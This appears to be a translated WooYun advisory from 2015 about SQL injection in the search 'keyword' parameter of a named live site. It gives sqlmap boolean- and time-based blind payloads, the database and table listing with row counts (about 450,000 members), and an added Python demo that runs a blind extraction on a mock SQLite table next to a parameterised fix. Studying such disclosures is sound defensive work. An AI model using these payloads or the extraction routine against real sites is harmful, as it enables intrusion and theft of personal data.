
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0146950

Title: SQL injection on the 试客联盟 (Shikee Alliance) 众用助手 (Zhongyong Assistant) site exposes 45W (450,000+) member records

Affected vendor: shikee.com

Reporter: 无名人

Submitted: 2015-10-15 16:58

Fix time: 2015-10-20 17:00

Public disclosure: 2015-10-20 17:00

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-10-15: details sent to the vendor, awaiting vendor handling
2015-10-20: vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

众用助手 (Zhongyong Assistant): the first domestic subsidy-based app distribution platform.
Zhongyong Assistant builds on the trial-marketing model and 3.5 million members of 一站网's 试客联盟 and 众划算, replacing the traditional way of promoting Internet apps with an experience-marketing model. It sets up a distribution platform between developers and real users, giving app developers targeted user acquisition and experience-marketing services so that promotion is precise and effective.

Detailed description:

Vulnerable URL:

http://zhelp.shikee.com/home/search?keyword=a


The keyword parameter is injectable (sqlmap output):

---
Parameter: keyword (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: keyword=a%' AND 4924=4924 AND '%'='
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: keyword=a%' AND (SELECT * FROM (SELECT(SLEEP(5)))yxoY) AND '%'='
---
[14:05:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.10
back-end DBMS: MySQL 5.0.12
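The shape of both payloads (`a%' AND ... AND '%'='`) implies that the search term is spliced into a `LIKE '%...%'` pattern with no escaping, so a single quote closes the literal and the rest is evaluated as SQL. The script below is an added example, not code from this report or from shikee.com: it reconstructs that inferred query shape against an in-memory SQLite table with constructed rows, runs the same boolean-based blind differential sqlmap used, shows how that TRUE/FALSE oracle is turned into character-by-character data extraction, and places a parameterised version of the query beside it (the remediation the report leaves blank). The table name, sample rows, and all function names are assumptions; SQLite has no SLEEP(), so only the boolean variant is reproduced, not the time-based one.

```python
import sqlite3
import string

# Constructed sample rows for the demo; not data from the affected site.
SAMPLE_APPS = [("AlphaNotes", "productivity"), ("Beta Runner", "games"), ("Gamma Pay", "finance")]


def make_db():
    """In-memory stand-in for the app table (name and layout are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mobile_app (id INTEGER PRIMARY KEY, name TEXT, category TEXT)")
    conn.executemany("INSERT INTO mobile_app (name, category) VALUES (?, ?)", SAMPLE_APPS)
    conn.commit()
    return conn


def search_vulnerable(conn, keyword):
    """Query shape inferred from the sqlmap payload: the raw keyword is spliced
    into '%...%' with no escaping, so a single quote closes the string literal."""
    sql = "SELECT name FROM mobile_app WHERE name LIKE '%" + keyword + "%' ORDER BY id"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, keyword):
    """Hardened form: LIKE metacharacters in the input are escaped, the pattern
    is built in code, and the whole pattern is bound as one parameter."""
    escaped = keyword.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT name FROM mobile_app WHERE name LIKE ? ESCAPE '\\' ORDER BY id"
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]


def blind_oracle(search, conn, keyword, condition):
    """Boolean-based blind probe in the same shape as the report's payload:
        keyword=a%' AND <condition> AND '%'=
    Returns True when the injected condition is TRUE (result set unchanged) and
    False when it is FALSE (result set collapses) or when the input is handled
    as a literal string, in which case no condition ever matches the baseline."""
    baseline = search(conn, keyword)
    probe = search(conn, f"{keyword}%' AND ({condition}) AND '%'='")
    return probe == baseline


def is_injectable(search, conn, keyword):
    """sqlmap-style differential: a TRUE condition must leave the page unchanged
    and a FALSE condition must change it."""
    return blind_oracle(search, conn, keyword, "1=1") and not blind_oracle(search, conn, keyword, "1=2")


def extract_via_blind(search, conn, keyword, subquery, charset=string.ascii_letters + string.digits + " _-.@"):
    """Recover the scalar result of `subquery` one character at a time using only
    the TRUE/FALSE oracle; this is how a blind injection becomes a data leak.
    Quote and backslash are left out of the charset because they would break the
    payload's own quoting. Note: SQLite compares strings byte-wise; on MySQL with
    a case-insensitive collation the comparison would need BINARY or ASCII()."""
    length = None
    for n in range(1, 64):
        if blind_oracle(search, conn, keyword, f"length({subquery})={n}"):
            length = n
            break
    if length is None:
        return None
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if blind_oracle(search, conn, keyword, f"substr({subquery},{pos},1)='{ch}'"):
                recovered += ch
                break
        else:
            return None
    return recovered


if __name__ == "__main__":
    db = make_db()
    first_name = "(SELECT name FROM mobile_app ORDER BY id LIMIT 1)"
    print("vulnerable injectable:", is_injectable(search_vulnerable, db, "a"))
    print("fixed injectable:     ", is_injectable(search_fixed, db, "a"))
    print("leaked via blind:     ", extract_via_blind(search_vulnerable, db, "a", first_name))
```

The fixed variant escapes `%` and `_` as well as binding the value: parameterisation alone stops the injection, but without the escape a user could still supply wildcards and enumerate the table with patterns, which is a separate (lower-severity) issue from the one reported here.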

Proof of concept:

Databases:

available databases [2]:
[*] information_schema
[*] zhongyongapp


45W+ (450,000+) member records exposed:

Database: zhongyongapp
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| mobile_app_subsidy_apply_period | 9189697 |
| mobile_app_subsidy_apply_log | 7700434 |
| mobile_user_message | 5847387 |
| mobile_system_log_hlpay | 3023412 |
| mobile_app_subsidy_apply | 1956328 |
| mobile_app_downlog | 1316216 |
| mobile_app_subsidy_apply_step | 778630 |
| mobile_app_subsidy_rebates_pay | 778431 |
| mobile_members20150601 | 386149 |
| mobile_app_task_apply_log | 237048 |
| mobile_user_sign_log | 171401 |
| mobile_user_device | 149860 |
| mobile_user | 89294 |
| mobile_app_task_user_share_score | 84091 |
| mobile_user_invite_reward | 79963 |
| mobile_app_img | 67865 |
| mobile_system_subsidy | 62898 |
| mobile_system_subsidy_history | 61087 |
| mobile_app_task_apply | 54780 |
| mobile_app_task_rebates_pay | 33704 |
| mobile_user_invite | 31018 |
| mobile_system_task | 19270 |
| mobile_admin_log | 15890 |
| mobile_app_log | 15181 |
| mobile_system_task_log | 15129 |
| mobile_sql_log | 15104 |
| mobile_task_xls | 13879 |
| mobile_app | 13860 |
| mobile_user_sign | 13744 |
| mobile_app_collection | 8038 |
| mobile_user_comment | 7006 |
| mobile_app_subsidy_log | 4699 |
| mobile_user_suggest | 4606 |
| mobile_app_subsidy_period | 3594 |
| mobile_app_subsidy_finance | 3003 |
| mobile_app_task_log | 1896 |
| mobile_user_first_reward | 1596 |
| mobile_user_extend | 1593 |
| mobile_app_task | 1157 |
| mobile_app_subsidy | 1004 |
| mobile_task_pay | 734 |
| mobile_finance_log | 643 |
| mobile_user_open | 472 |
| mobile_app_subsidy_append | 467 |
| mobile_user_freeze_log | 382 |
| mobile_app_special_apply | 375 |
| mobile_task_img | 348 |
| mobile_app_task_option | 308 |
| mobile_app_category | 150 |
| mobile_message_board | 119 |
| mobile_task_extend | 74 |
| mobile_rebate_failure_log | 65 |
| mobile_help_img | 39 |
| mobile_system_config | 37 |
| mobile_app_special | 36 |
| mobile_common_session | 25 |
| mobile_help_category | 24 |
| mobile_help | 20 |
| mobile_web_home_advertisement | 19 |
| mobile_app_home_advertisement | 12 |
| mobile_app_task_apply_timeout_log | 1 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1285 |
| SESSION_VARIABLES | 445 |
| GLOBAL_VARIABLES | 431 |
| GLOBAL_STATUS | 341 |
| SESSION_STATUS | 341 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219 |
| COLLATIONS | 219 |
| STATISTICS | 138 |
| PARTITIONS | 128 |
| TABLES | 128 |
| KEY_COLUMN_USAGE | 92 |
| TABLE_CONSTRAINTS | 85 |
| PLUGINS | 42 |
| CHARACTER_SETS | 40 |
| INNODB_FT_DEFAULT_STOPWORD | 36 |
| PROCESSLIST | 23 |
| SCHEMA_PRIVILEGES | 18 |
| PARAMETERS | 11 |
| ENGINES | 9 |
| REFERENTIAL_CONSTRAINTS | 3 |
| ROUTINES | 3 |
| SCHEMATA | 2 |
| TRIGGERS | 1 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+




Remediation: (not provided by the reporter)

Copyright notice: please credit 无名人@乌云 when reposting.


Vulnerability response

Vendor response:

Severity: no impact (vendor ignored the report)

Ignored at: 2015-10-20 17:00

Vendor reply: (none)

Vulnerability Rank: 15 (WooYun assessment)

Latest status:

None